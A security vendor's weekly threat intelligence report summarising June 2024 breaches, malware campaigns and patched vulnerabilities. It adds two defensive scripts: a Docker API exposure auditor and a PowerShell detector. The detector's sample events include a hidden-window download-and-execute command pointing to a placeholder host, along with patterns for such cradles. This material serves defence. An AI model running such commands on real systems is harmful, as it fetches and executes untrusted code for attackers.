The Ntirety Weekly Threat Intelligence Report: June 24, 2024

Welcome to Ntirety's Threat Intelligence Summary, where our elite Security and Threat Response Team delivers critical insights and expert analysis. Each report highlights the most pressing cyber threats and vulnerabilities currently active, to educate and raise awareness among our partners, customers, and the broader community. Committed to securing mission-critical data, Ntirety's managed security services proactively monitor and combat these threats to ensure the safety of our customers.


Industry Breaches

  • Keytronic: PCBA manufacturing giant Keytronic is warning it suffered a data breach after the Black Basta ransomware gang leaked 530 GB of the company’s stolen data. The threat actors claim that human resources, finance, engineering, and corporate data were stolen in the attack.

Threats to Watch

  • UNC3886: The China-nexus cyber espionage actor linked to the zero-day exploitation of security flaws in Fortinet, Ivanti, and VMware devices has been observed using multiple persistence mechanisms to maintain unfettered access to compromised environments. The threat actor, UNC3886, has exploited many zero-day flaws, including CVE-2022-42328, CVE-2022-22948, CVE-2023-20867, and CVE-2022-42475.

  • SquidLoader: Researchers have uncovered a new evasive malware loader named SquidLoader that spreads via phishing campaigns targeting Chinese organizations. The attack chain leverages phishing emails that come with attachments that masquerade as Microsoft Word documents but are actually binaries that pave the way for the execution of the malware.

  • Fickle Stealer: A new Rust-based information stealer malware called Fickle Stealer has been observed being delivered via multiple attack chains with the goal of harvesting sensitive information from compromised hosts. There are 4 different distribution methods including VBA dropper, VBA downloader, link downloader, and executable downloader.

  • Vortax: A widespread malicious campaign targeting cryptocurrency users and involving Vortax (a fake virtual meeting software) has been observed. Once installed, Vortax delivers three information stealers in cross-platform attacks in an extensive campaign aimed at cryptocurrency theft.

  • Markopolo: A threat actor who goes by the alias markopolo has been identified as being behind a large-scale cross-platform scam that targets digital currency users on social media with information stealer malware. The attack chains use the virtual meeting software named Vortax as a conduit to deliver Rhadamanthys, StealC, and Atomic macOS Stealer.

  • VoidArachne: Chinese-speaking users are the target of a new threat activity cluster, dubbed Void Arachne, that employs malicious Windows Installer files for VPNs to deliver a C2 framework called Winos 4.0.

  • ONNX: A new phishing-as-a-service platform called ONNX Store is targeting Microsoft 365 accounts for employees at financial firms using QR codes in PDF attachments. The platform can target both M365 and O365 email accounts and operates via Telegram bots and features MFA bypass mechanisms.

  • Hijack Loader: Threat actors are luring unsuspecting users with free or pirated versions of commercial software to deliver a malware loader called Hijack Loader, which then deploys an information stealer known as Vidar Stealer. The adversaries had managed to trick users into downloading password-protected archive files containing trojanized copies of a Cisco Webex Meetings App.

  • TIKTAG: A new speculative execution attack named “TIKTAG” targets ARM’s Memory Tagging Extension to leak data with over a 95% chance of success, allowing hackers to bypass the security feature.

  • Velvet Ant: A group of suspected Chinese cyberespionage actors named “Velvet Ant” are deploying custom malware on F5 BIG-IP appliances to gain a persistent connection to the internal network and steal data. The attackers used compromised F5 BIG-IP appliances to retain persistence on the network, allowing them to gain access to the internal network while blending attacker traffic with legitimate network traffic, making detection more difficult.

  • VMware: VMware has released updates to address critical flaws impacting Cloud Foundation, vCenter Server, and vSphere ESXi that could be exploited to achieve privilege escalation and remote code execution.

  • Docker: Researchers have uncovered a new malware campaign that targets publicly exposed Docker API endpoints with the aim of delivering cryptocurrency miners and other payloads. An analysis of the campaign has revealed tactical overlaps with a previous activity dubbed Spinning YARN. The attack commences with the threat actors zeroing in on Docker servers with exposed ports to initiate a series of steps, starting with reconnaissance and privilege escalation before proceeding to the exploitation phase.

  • Fake Chrome: A new malware distribution campaign uses fake Google Chrome, Word and OneDrive errors to trick users into running malicious PowerShell “fixes” that install malware. The campaign was observed being used by multiple threat actors including those behind ClearFake, and the TA571 threat actor.

  • DISGOMOJI: A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024. The activity is being tracked under UTA0137, noting the adversary’s exclusive use of a malware called DISGOMOJI. The malware is written in Golang and is designed to infect Linux systems.

  • Smishing Triad: Pakistan has become the latest target of a threat actor called Smishing Triad. The group’s latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS.

  • NiceRAT: Threat actors have been observed deploying a malware called NiceRAT to co-opt infected devices with a botnet. The attacks have been targeting South Korean users and are designed to propagate malware under the guise of cracked software such as Microsoft Windows.

  • BadSpace: Legitimate but compromised websites are being used as a conduit to deliver a Windows backdoor dubbed BadSpace under the guise of fake browser updates. The threat actor employs a multi-stage attack chain involving an infected website, a C2 server, in some cases a fake browser update, and a JScript downloader to deploy a backdoor onto the victim’s system.

  • ASUS: ASUS has released a new firmware update that addresses a vulnerability impacting 7 router models that allows remote attackers to log into the devices. The flaw (CVE-2024-3080) is an authentication bypass vulnerability allowing unauthenticated, remote attackers to take control of the device.
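The Docker item above turns on one misconfiguration: a daemon API reachable over the network without authentication. The following script is an added example, not code from the report or from the Docker project; it audits the two places the daemon's listen addresses are normally set (daemon.json `hosts`, or `-H`/`--host` flags on the dockerd command line in a systemd unit) and flags any TCP listener that is not loopback-only and lacks `tlsverify`. The sample configurations are constructed for the example; the severity labels are the author's own choice.

```python
"""Audit a Docker daemon configuration for a network-exposed, unauthenticated API."""
import json
import shlex
from urllib.parse import urlsplit

LOOPBACK = {"127.0.0.1", "::1", "localhost"}

# Constructed sample inputs (not taken from the report): a weak daemon.json,
# a hardened daemon.json, and a weak systemd ExecStart line for dockerd.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
HARDENED_DAEMON_JSON = (
    '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],'
    ' "tlsverify": true, "tlscacert": "/etc/docker/ca.pem",'
    ' "tlscert": "/etc/docker/server-cert.pem", "tlskey": "/etc/docker/server-key.pem"}'
)
WEAK_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"


def hosts_from_daemon_json(text):
    """Return (listen addresses, tlsverify flag) from a daemon.json document."""
    cfg = json.loads(text)
    return list(cfg.get("hosts", [])), bool(cfg.get("tlsverify", False))


def hosts_from_execstart(line):
    """Return (listen addresses, tlsverify flag) from a systemd ExecStart= line for dockerd."""
    cmd = line.split("=", 1)[1] if line.startswith("ExecStart=") else line
    args = shlex.split(cmd)
    hosts, tlsverify = [], False
    i = 0
    while i < len(args):
        arg = args[i]
        if arg in ("-H", "--host") and i + 1 < len(args):
            hosts.append(args[i + 1])  # value given as the next token
            i += 2
            continue
        if arg.startswith("--host=") or arg.startswith("-H="):
            hosts.append(arg.split("=", 1)[1])  # value given inline
        elif arg in ("--tlsverify", "--tlsverify=true"):
            tlsverify = True
        i += 1
    return hosts, tlsverify


def audit(hosts, tlsverify):
    """Rate every TCP listener; unix:// and fd:// listeners are local and skipped."""
    findings = []
    for host in hosts:
        if not host.startswith("tcp://"):
            continue
        # An empty host part (tcp://:2375) binds all interfaces, like 0.0.0.0.
        addr = urlsplit(host).hostname or "0.0.0.0"
        if addr in LOOPBACK:
            findings.append((host, "LOW", "TCP API bound to loopback only"))
        elif tlsverify:
            findings.append((host, "MEDIUM", "network-reachable TCP API; TLS client-certificate verification enabled"))
        else:
            findings.append((host, "CRITICAL", "network-reachable TCP API with no authentication"))
    return findings


if __name__ == "__main__":
    for label, source in (("weak daemon.json", hosts_from_daemon_json(WEAK_DAEMON_JSON)),
                          ("hardened daemon.json", hosts_from_daemon_json(HARDENED_DAEMON_JSON)),
                          ("weak ExecStart", hosts_from_execstart(WEAK_EXECSTART))):
        for host, severity, reason in audit(*source):
            print(f"{label}: {severity} {host}: {reason}")
```

In practice only one of the two sources applies on a given host, because dockerd refuses to start when `hosts` is set in daemon.json and `-H` is also passed on the command line; point the matching parser at whichever your installation uses.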
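The Fake Chrome item above ends with the user running a PowerShell "fix" by hand, so the telemetry a defender has is a process-creation event. The following detector is an added example written for this report, not code from the researchers or vendors cited; it scores constructed process-creation events on generic PowerShell indicators (hidden window, encoded command, execution-policy bypass, a download-and-execute cradle) and on a parent-process heuristic. The event format, the indicator weights, the threshold and the assumption that a pasted "fix" is typically spawned by explorer.exe are all the author's own; the placeholder URL uses the reserved `.invalid` domain.

```python
"""Score constructed process-creation events for user-run malicious PowerShell 'fixes'."""
import re

# Constructed events (not real telemetry) in a simple key=value form.
SAMPLE_EVENTS = [
    'parent=explorer.exe image=powershell.exe cmdline="powershell -w hidden -ep bypass -c iex (iwr http://placeholder.invalid/fix.ps1)"',
    'parent=cmd.exe image=powershell.exe cmdline="powershell -NoProfile -File C:\\scripts\\backup.ps1"',
    'parent=explorer.exe image=powershell.exe cmdline="powershell -enc SQBFAFgAIAAoAGkAdwByACAAaAB0AHQAcAA6AC8ALwA="',  # constructed base64 blob
    'parent=svchost.exe image=notepad.exe cmdline="notepad.exe readme.txt"',
]

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')

# (pattern, weight, label): weights are an illustrative choice, not a vendor standard.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I), 2, "encoded command"),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), 1, "execution policy bypass"),
]
CRADLE_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
CRADLE_FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I)


def parse_event(line):
    """Turn 'key=value key="quoted value"' into a dict."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in FIELD.finditer(line)}


def score_event(event):
    """Return (score, reasons) for one event; non-PowerShell images score 0."""
    if event.get("image", "").lower() not in ("powershell.exe", "pwsh.exe"):
        return 0, []
    cmd = event.get("cmdline", "")
    score, reasons = 0, []
    for pattern, weight, label in INDICATORS:
        if pattern.search(cmd):
            score += weight
            reasons.append(label)
    # Fetch plus in-memory execution in one command line is the classic cradle shape.
    if CRADLE_EXEC.search(cmd) and CRADLE_FETCH.search(cmd):
        score += 3
        reasons.append("download-and-execute cradle")
    # Assumption: a 'fix' pasted into the Run dialog is spawned by explorer.exe.
    if event.get("parent", "").lower() == "explorer.exe":
        score += 1
        reasons.append("launched from the shell (e.g. Run dialog)")
    return score, reasons


def detect(lines, threshold=3):
    """Return an alert dict for every event whose score reaches the threshold."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        if score >= threshold:
            alerts.append({"cmdline": event.get("cmdline"), "score": score, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["score"], alert["reasons"], alert["cmdline"])
```

The scoring is deliberately additive so that a single benign indicator (an admin running a signed script with `-ep bypass`) stays below the threshold while the combination the campaign relies on does not; tune the weights against your own baseline of PowerShell use before alerting on it.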


Concerned about the security of your network, systems, applications, or data? Given the ever-growing list of cyber threats, your concerns are justified. 

For over 25 years, Ntirety has been at the forefront of helping organizations anticipate and stay protected from both known and emerging cyber threats. Contact us to discover how our proactive managed security services can strengthen your organization's security posture and provide peace of mind. 
